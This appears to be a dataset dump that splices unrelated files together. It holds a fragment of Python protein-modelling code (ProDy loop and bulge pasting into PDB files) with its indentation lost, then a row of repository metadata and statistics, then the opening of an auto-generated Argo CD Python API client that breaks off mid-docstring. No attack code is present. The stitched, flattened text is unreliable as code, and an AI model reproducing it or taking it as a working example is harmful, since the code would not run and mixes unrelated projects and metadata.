for i, (pdbN, loop, pdbC) in enumerate(zip(pdb_Ns, loop_slices, pdb_Cs)):
pdbN_first_index = pdbC_first_index
pdbN_resnums = pdbN.getResnums()
if pdbN.select('index ' + str(pdbN_first_index)).getNames()[0] == 'N':
pdbN.setResnums(pdbN_resnums - pdbN_first_index_resnum + loop_last_resnum + 1)
else:
pdbN.setResnums(pdbN_resnums - pdbN_first_index_resnum + loop_last_resnum + 0)
num_ind = len(pdbN.getIndices())
start = 1
finish = start + num_ind
pdbN.setBetas(list(range(start, finish)))
if not keep_resnames:
pdbN.setResnames('GLY')
pdbN.setChids('A')
pdbN.setSegnames('A')
pdbN_last_resnum = pdbN.getResnums()[-1]
loop_resnums = loop.getResnums()
loop_first_resnum = loop_resnums[0]
if loop.getNames()[0] == 'N':
loop.setResnums(loop_resnums - loop_first_resnum + pdbN_last_resnum + 1)
else:
loop.setResnums(loop_resnums - loop_first_resnum + pdbN_last_resnum)
loop.setChids('A')
num_ind = len(loop.getIndices())
start = finish
finish = start + num_ind
loop.setBetas(list(range(start, finish)))
loop.setResnames('GLY')
pdbN_last_index = pdbN.getIndices()[-1]
loop_last_resnum = loop.getResnums()[-1]
pdbC_first_index = pdbC.getIndices()[0]
pdbN_first_index_resnum = pdbC.select('index ' + str(pdbC_first_index)).getResnums()[0]
writePDBStream(outfile, pdbN.select('index ' + str(pdbN_first_index) + 'to' + str(pdbN_last_index)))
writePDBStream(outfile, loop)
pdbN.setResnums(pdbN_resnums)
loop.setResnums(loop_resnums)
if i + 1 == l:
num_ind = len(pdbC.getIndices())
start = finish
finish = start + num_ind
pdbC.setBetas(list(range(start, finish)))
if not keep_resnames:
pdbC.setResnames('GLY')
pdbC_resnums = pdbC.getResnums()
pdbC_first_resnum = pdbC_resnums[0]
if pdbC.getNames()[0] == 'N':
pdbC.setResnums(pdbC_resnums - pdbC_first_resnum + loop_last_resnum + 1)
else:
pdbC.setResnums(pdbC_resnums - pdbC_first_resnum + loop_last_resnum)
pdbC.setChids('A')
pdbC.setSegnames('A')
writePDBStream(outfile, pdbC)
pdbC.setResnums(pdbC_resnums)
if keep_ligand and original_pdb is not None:
pdb = pr.parsePDB(original_pdb)
lig = pdb.select('not protein')
num_ind = len(lig.getIndices())
start = finish
finish = start + num_ind
lig.setBetas(list(range(start, finish)))
writePDBStream(outfile, lig)
def paste_bulge(path_to_loop, path_to_pdb, query_selection_N, query_selection_C, query_length_N=4, query_length_C=4):
"""Like paste_loop, but flags bulge residues in the loop by backbone dihedrals and preserves their sidechains."""
loop = pr.parsePDB(path_to_loop)
loop.setSegnames('A')
keep = list()
psi_prev = 0
for i, res in enumerate(loop.iterResidues()):
if i > 0:
try:
phi = pr.calcPhi(res)
except Exception:
# Terminal residues have no phi; treat as 0 for the bulge test.
phi = 0
try:
psi = pr.calcPsi(res)
# Flag bulge residues by backbone dihedrals; keep their sidechains.
if psi > -32 and (phi + psi_prev <= -125):
resnum = set(res.getResnums()).pop()
keep.append(resnum + 4)
psi_prev = psi
except Exception:
pass
if len(keep) > 0:
loop_bb = loop.select('backbone or resnum ' + ' '.join([str(i) for i in keep]))
loop.select('not resnum ' + ' '.join([str(i) for i in keep])).setResnames('GLY')
else:
loop_bb = loop.select('backbone')
loop.setResnames('GLY')
pdb = pr.parsePDB(path_to_pdb)
query_N_bb = pdb.select(query_selection_N + ' and name N C CA')
query_C_bb = pdb.select(query_selection_C + ' and name N C CA')
first_resnum_loop = loop_bb.getResnums()[0]
last_resnum_loop = loop_bb.getResnums()[-1]
n_last = first_resnum_loop + query_length_N - 1
c_first = last_resnum_loop - query_length_C + 1
if len(keep) > 0:
if any([k <= n_last for k in keep]):
n_last = min(keep) - 1
if any([k >= c_first for k in keep]):
c_first = max(keep) + 1
if n_last <= first_resnum_loop:
n_last = first_resnum_loop + 1
if c_first >= last_resnum_loop:
c_first = last_resnum_loop - 1
loop_N_bb = loop_bb.select('name N C CA and resnum `' + str(first_resnum_loop) + 'to' + str(n_last) + '`')
loop_C_bb = loop_bb.select('name N C CA and resnum `' + str(c_first) + 'to' + str(last_resnum_loop) + '`')
len_loop_N = n_last - first_resnum_loop + 1
len_loop_C = last_resnum_loop - c_first + 1
print('len loop N bb=', len_loop_N)
print('len loop C bb=', len_loop_C)
try:
coords_diff_N = loop_N_bb.getCoords() - query_N_bb.getCoords()[:len_loop_N*3+1]
coords_diff_C = loop_C_bb.getCoords() - query_C_bb.getCoords()[-len_loop_C*3:]
except ValueError:
# Mismatched atom counts between loop and query selections; bail out.
print('Loop failure')
return None, None, None
ind_match_N = np.argmin([np.linalg.norm(i) for i in coords_diff_N])
ind_match_C = np.argmin([np.linalg.norm(i) for i in coords_diff_C])
loop_N_bb_index = loop_N_bb.getIndices()[ind_match_N]
loop_C_bb_index = loop_C_bb.getIndices()[ind_match_C]
query_N_bb_index = query_N_bb.getIndices()[ind_match_N]
query_C_bb_index = query_C_bb.getIndices()[ind_match_C]
first_index_pdb = pdb.select('backbone').getIndices()[0]
last_index_pdb = pdb.select('backbone').getIndices()[-1]
loop_slice = loop_bb.select('index ' + str(loop_N_bb_index) + 'to' + str(loop_C_bb_index))
pdb_N = pdb.select('backbone and index ' + str(first_index_pdb) + 'to' + str(query_N_bb_index - 1))
pdb_C = pdb.select('backbone and index ' + str(query_C_bb_index + 1) + 'to' + str(last_index_pdb))
return pdb_N, loop_slice, pdb_C
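# paste_bulge works like paste_loop but first scans the loop dihedrals
# (psi > -32 with phi + previous psi <= -125) to flag bulge residues whose
# sidechains are kept. Illustrative call, with assumed file names:
# pdb_N, bulge_slice, pdb_C = paste_bulge('bulge.pdb', 'scaffold.pdb',
#                                         'chain C and resnum 39to44',
#                                         'chain D and resnum 4to12')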
def print_bulge_pdb(pdb_Ns, loop_slices, pdb_Cs, outdir):
"""pdb_Ns, loop_slices, pdb_Cs are lists that should be in order of increasing residue number (i.e., N to C)"""
if outdir[-1] != '/':
outdir += '/'
os.makedirs(outdir, exist_ok=True)
with open(outdir + repr(loop_slices[0]).split()[-3] + '_' + repr(pdb_Ns[0]).split()[-3] + '_loop.pdb', 'w') as outfile:
l = len(loop_slices)
pdbC_first_index = pdb_Ns[0].getIndices()[0]
pdbN_first_index_resnum = 0
loop_last_resnum = -1
for i, (pdbN, loop, pdbC) in enumerate(zip(pdb_Ns, loop_slices, pdb_Cs)):
pdbN_first_index = pdbC_first_index
pdbN_resnums = pdbN.getResnums()
if pdbN.select('index ' + str(pdbN_first_index)).getNames()[0] == 'N':
pdbN.setResnums(pdbN_resnums - pdbN_first_index_resnum + loop_last_resnum + 1)
else:
pdbN.setResnums(pdbN_resnums - pdbN_first_index_resnum + loop_last_resnum + 0)
num_ind = len(pdbN.getIndices())
start = 1
finish = start + num_ind
pdbN.setBetas(list(range(start, finish)))
pdbN.setResnames('GLY')
pdbN.setChids('A')
pdbN_last_resnum = pdbN.getResnums()[-1]
loop_resnums = loop.getResnums()
loop_first_resnum = loop_resnums[0]
if loop.getNames()[0] == 'N':
loop.setResnums(loop_resnums - loop_first_resnum + pdbN_last_resnum + 1)
else:
loop.setResnums(loop_resnums - loop_first_resnum + pdbN_last_resnum)
loop.setChids('A')
num_ind = len(loop.getIndices())
start = finish
finish = start + num_ind
loop.setBetas(list(range(start, finish)))
pdbN_last_index = pdbN.getIndices()[-1]
loop_last_resnum = loop.getResnums()[-1]
pdbC_first_index = pdbC.getIndices()[0]
pdbN_first_index_resnum = pdbC.select('index ' + str(pdbC_first_index)).getResnums()[0]
writePDBStream(outfile, pdbN.select('index ' + str(pdbN_first_index) + 'to' + str(pdbN_last_index)))
writePDBStream(outfile, loop)
pdbN.setResnums(pdbN_resnums)
loop.setResnums(loop_resnums)
if i + 1 == l:
num_ind = len(pdbC.getIndices())
start = finish
finish = start + num_ind
pdbC.setBetas(list(range(start, finish)))
pdbC.setResnames('GLY')
pdbC_resnums = pdbC.getResnums()
pdbC_first_resnum = pdbC_resnums[0]
if pdbC.getNames()[0] == 'N':
pdbC.setResnums(pdbC_resnums - pdbC_first_resnum + loop_last_resnum + 1)
else:
pdbC.setResnums(pdbC_resnums - pdbC_first_resnum + loop_last_resnum)
pdbC.setChids('A')
writePDBStream(outfile, pdbC)
pdbC.setResnums(pdbC_resnums)
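# A minimal end-to-end sketch of the stitching pipeline above (file names,
# selections, and the output directory are illustrative assumptions):
# pdb_N, loop_slice, pdb_C = paste_loop('loop.pdb', 'scaffold.pdb',
#                                       'chain C and resnum 39to44',
#                                       'chain D and resnum 4to12')
# if pdb_N is not None:  # paste_loop returns Nones when coordinates mismatch
#     print_loop_pdb([pdb_N], [loop_slice], [pdb_C], 'stitched/',
#                    keep_ligand=True, original_pdb='scaffold.pdb')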
| 44.496324
| 142
| 0.607618
| 1,665
| 12,103
| 4.106907
| 0.084084
| 0.046797
| 0.032904
| 0.009359
| 0.866628
| 0.815882
| 0.80155
| 0.770401
| 0.731939
| 0.715268
| 0
| 0.011055
| 0.275056
| 12,103
| 272
| 143
| 44.496324
| 0.768293
| 0.024209
| 0
| 0.733051
| 0
| 0
| 0.044411
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016949
| false
| 0.012712
| 0.016949
| 0
| 0.042373
| 0.025424
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 15bdd56c9996afd83d7fa05892a85ba59fbbd705
| 136,540
| py
| Python
| argocd_python_client/api/application_service_api.py
| RyanSiu1995/argocd-python-client
| 2e8f097fe09f247a46ac70692241a93d1acd076a
| ["MIT"] | 1
| 2021-11-20T13:37:43.000Z
| 2021-11-20T13:37:43.000Z
| argocd_python_client/api/application_service_api.py
| RyanSiu1995/argocd-python-client
| 2e8f097fe09f247a46ac70692241a93d1acd076a
| ["MIT"] | null | null | null
| argocd_python_client/api/application_service_api.py
| RyanSiu1995/argocd-python-client
| 2e8f097fe09f247a46ac70692241a93d1acd076a
| ["MIT"] | null | null | null
|
"""
Consolidate Services
Description of all APIs # noqa: E501
The version of the OpenAPI document: version not set
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from argocd_python_client.api_client import ApiClient, Endpoint as _Endpoint
from argocd_python_client.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from argocd_python_client.model.application_application_patch_request import ApplicationApplicationPatchRequest
from argocd_python_client.model.application_application_resource_response import ApplicationApplicationResourceResponse
from argocd_python_client.model.application_application_rollback_request import ApplicationApplicationRollbackRequest
from argocd_python_client.model.application_application_sync_request import ApplicationApplicationSyncRequest
from argocd_python_client.model.application_application_sync_windows_response import ApplicationApplicationSyncWindowsResponse
from argocd_python_client.model.application_managed_resources_response import ApplicationManagedResourcesResponse
from argocd_python_client.model.application_resource_actions_list_response import ApplicationResourceActionsListResponse
from argocd_python_client.model.repository_manifest_response import RepositoryManifestResponse
from argocd_python_client.model.runtime_error import RuntimeError
from argocd_python_client.model.stream_result_of_application_log_entry import StreamResultOfApplicationLogEntry
from argocd_python_client.model.stream_result_of_v1alpha1_application_tree import StreamResultOfV1alpha1ApplicationTree
from argocd_python_client.model.stream_result_of_v1alpha1_application_watch_event import StreamResultOfV1alpha1ApplicationWatchEvent
from argocd_python_client.model.v1_event_list import V1EventList
from argocd_python_client.model.v1alpha1_application import V1alpha1Application
from argocd_python_client.model.v1alpha1_application_list import V1alpha1ApplicationList
from argocd_python_client.model.v1alpha1_application_spec import V1alpha1ApplicationSpec
from argocd_python_client.model.v1alpha1_application_tree import V1alpha1ApplicationTree
from argocd_python_client.model.v1alpha1_revision_metadata import V1alpha1RevisionMetadata
class ApplicationServiceApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def __application_service_create(
self,
body,
**kwargs
):
"""Create creates an application # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_create(body, async_req=True)
>>> result = thread.get()
Args:
body (V1alpha1Application):
Keyword Args:
upsert (bool): [optional]
validate (bool): [optional]
_return_http_data_only (bool): response data without HTTP status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number is provided, it will be the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
V1alpha1Application
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['body'] = \
body
return self.call_with_http_info(**kwargs)
self.application_service_create = _Endpoint(
settings={
'response_type': (V1alpha1Application,),
'auth': [],
'endpoint_path': '/api/v1/applications',
'operation_id': 'application_service_create',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'body',
'upsert',
'validate',
],
'required': [
'body',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'body':
(V1alpha1Application,),
'upsert':
(bool,),
'validate':
(bool,),
},
'attribute_map': {
'upsert': 'upsert',
'validate': 'validate',
},
'location_map': {
'body': 'body',
'upsert': 'query',
'validate': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__application_service_create
)
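# Illustrative call through the public attribute wired above (assumes a running
# Argo CD API server and a populated V1alpha1Application named `app`):
# api = ApplicationServiceApi()
# created = api.application_service_create(app, upsert=True)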
def __application_service_delete(
self,
name,
**kwargs
):
"""Delete deletes an application # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_delete(name, async_req=True)
>>> result = thread.get()
Args:
name (str):
Keyword Args:
cascade (bool): [optional]
propagation_policy (str): [optional]
_return_http_data_only (bool): response data without HTTP status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number is provided, it will be the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
bool, date, datetime, dict, float, int, list, str, none_type
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['name'] = \
name
return self.call_with_http_info(**kwargs)
self.application_service_delete = _Endpoint(
settings={
'response_type': (bool, date, datetime, dict, float, int, list, str, none_type,),
'auth': [],
'endpoint_path': '/api/v1/applications/{name}',
'operation_id': 'application_service_delete',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'name',
'cascade',
'propagation_policy',
],
'required': [
'name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
'cascade':
(bool,),
'propagation_policy':
(str,),
},
'attribute_map': {
'name': 'name',
'cascade': 'cascade',
'propagation_policy': 'propagationPolicy',
},
'location_map': {
'name': 'path',
'cascade': 'query',
'propagation_policy': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__application_service_delete
)
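# Illustrative: cascade-delete an application (the name is assumed):
# api.application_service_delete('guestbook', cascade=True)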
def __application_service_delete_resource(
self,
name,
**kwargs
):
"""DeleteResource deletes a single application resource # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_delete_resource(name, async_req=True)
>>> result = thread.get()
Args:
name (str):
Keyword Args:
namespace (str): [optional]
resource_name (str): [optional]
version (str): [optional]
group (str): [optional]
kind (str): [optional]
force (bool): [optional]
orphan (bool): [optional]
_return_http_data_only (bool): response data without HTTP status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number is provided, it will be the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
bool, date, datetime, dict, float, int, list, str, none_type
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['name'] = \
name
return self.call_with_http_info(**kwargs)
self.application_service_delete_resource = _Endpoint(
settings={
'response_type': (bool, date, datetime, dict, float, int, list, str, none_type,),
'auth': [],
'endpoint_path': '/api/v1/applications/{name}/resource',
'operation_id': 'application_service_delete_resource',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'name',
'namespace',
'resource_name',
'version',
'group',
'kind',
'force',
'orphan',
],
'required': [
'name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
'namespace':
(str,),
'resource_name':
(str,),
'version':
(str,),
'group':
(str,),
'kind':
(str,),
'force':
(bool,),
'orphan':
(bool,),
},
'attribute_map': {
'name': 'name',
'namespace': 'namespace',
'resource_name': 'resourceName',
'version': 'version',
'group': 'group',
'kind': 'kind',
'force': 'force',
'orphan': 'orphan',
},
'location_map': {
'name': 'path',
'namespace': 'query',
'resource_name': 'query',
'version': 'query',
'group': 'query',
'kind': 'query',
'force': 'query',
'orphan': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__application_service_delete_resource
)
def __application_service_get(
self,
name,
**kwargs
):
"""Get returns an application by name # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_get(name, async_req=True)
>>> result = thread.get()
Args:
name (str): the application's name
Keyword Args:
refresh (str): forces application reconciliation if set to true. [optional]
project ([str]): the project names to restrict the returned list of applications. [optional]
resource_version (str): when specified with a watch call, shows changes that occur after that particular version of a resource. [optional]
selector (str): the selector to restrict the returned list to applications with matching labels. [optional]
repo (str): the repoURL to restrict the returned list of applications. [optional]
_return_http_data_only (bool): response data without HTTP status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number is provided, it will be the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
V1alpha1Application
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['name'] = \
name
return self.call_with_http_info(**kwargs)
self.application_service_get = _Endpoint(
settings={
'response_type': (V1alpha1Application,),
'auth': [],
'endpoint_path': '/api/v1/applications/{name}',
'operation_id': 'application_service_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'name',
'refresh',
'project',
'resource_version',
'selector',
'repo',
],
'required': [
'name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
'refresh':
(str,),
'project':
([str],),
'resource_version':
(str,),
'selector':
(str,),
'repo':
(str,),
},
'attribute_map': {
'name': 'name',
'refresh': 'refresh',
'project': 'project',
'resource_version': 'resourceVersion',
'selector': 'selector',
'repo': 'repo',
},
'location_map': {
'name': 'path',
'refresh': 'query',
'project': 'query',
'resource_version': 'query',
'selector': 'query',
'repo': 'query',
},
'collection_format_map': {
'project': 'multi',
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__application_service_get
)
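# Illustrative: fetch one application by name, forcing reconciliation
# (the application name and refresh value are assumed):
# app = api.application_service_get('guestbook', refresh='normal')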
def __application_service_get_application_sync_windows(
self,
name,
**kwargs
):
"""Get returns sync windows of the application # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_get_application_sync_windows(name, async_req=True)
>>> result = thread.get()
Args:
name (str):
Keyword Args:
_return_http_data_only (bool): response data without HTTP status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number is provided, it will be the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
ApplicationApplicationSyncWindowsResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['name'] = \
name
return self.call_with_http_info(**kwargs)
self.application_service_get_application_sync_windows = _Endpoint(
settings={
'response_type': (ApplicationApplicationSyncWindowsResponse,),
'auth': [],
'endpoint_path': '/api/v1/applications/{name}/syncwindows',
'operation_id': 'application_service_get_application_sync_windows',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'name',
],
'required': [
'name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
},
'attribute_map': {
'name': 'name',
},
'location_map': {
'name': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__application_service_get_application_sync_windows
)
def __application_service_get_manifests(
self,
name,
**kwargs
):
"""GetManifests returns application manifests # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_get_manifests(name, async_req=True)
>>> result = thread.get()
Args:
name (str):
Keyword Args:
revision (str): [optional]
_return_http_data_only (bool): response data without HTTP status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number is provided, it will be the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
RepositoryManifestResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['name'] = \
name
return self.call_with_http_info(**kwargs)
self.application_service_get_manifests = _Endpoint(
settings={
'response_type': (RepositoryManifestResponse,),
'auth': [],
'endpoint_path': '/api/v1/applications/{name}/manifests',
'operation_id': 'application_service_get_manifests',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'name',
'revision',
],
'required': [
'name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
'revision':
(str,),
},
'attribute_map': {
'name': 'name',
'revision': 'revision',
},
'location_map': {
'name': 'path',
'revision': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__application_service_get_manifests
)
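# Illustrative: render the manifests for a pinned revision (values assumed):
# manifests = api.application_service_get_manifests('guestbook', revision='HEAD')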
def __application_service_get_resource(
self,
name,
**kwargs
):
"""GetResource returns single application resource # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_get_resource(name, async_req=True)
>>> result = thread.get()
Args:
name (str):
Keyword Args:
namespace (str): [optional]
resource_name (str): [optional]
version (str): [optional]
group (str): [optional]
kind (str): [optional]
_return_http_data_only (bool): response data without HTTP status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number is provided, it will be the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
ApplicationApplicationResourceResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['name'] = \
name
return self.call_with_http_info(**kwargs)
self.application_service_get_resource = _Endpoint(
settings={
'response_type': (ApplicationApplicationResourceResponse,),
'auth': [],
'endpoint_path': '/api/v1/applications/{name}/resource',
'operation_id': 'application_service_get_resource',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'name',
'namespace',
'resource_name',
'version',
'group',
'kind',
],
'required': [
'name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
'namespace':
(str,),
'resource_name':
(str,),
'version':
(str,),
'group':
(str,),
'kind':
(str,),
},
'attribute_map': {
'name': 'name',
'namespace': 'namespace',
'resource_name': 'resourceName',
'version': 'version',
'group': 'group',
'kind': 'kind',
},
'location_map': {
'name': 'path',
'namespace': 'query',
'resource_name': 'query',
'version': 'query',
'group': 'query',
'kind': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__application_service_get_resource
)
def __application_service_list(
self,
**kwargs
):
"""List returns list of applications # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_list(async_req=True)
>>> result = thread.get()
Keyword Args:
name (str): the application's name. [optional]
refresh (str): forces application reconciliation if set to true. [optional]
project ([str]): the project names to restrict the returned list of applications. [optional]
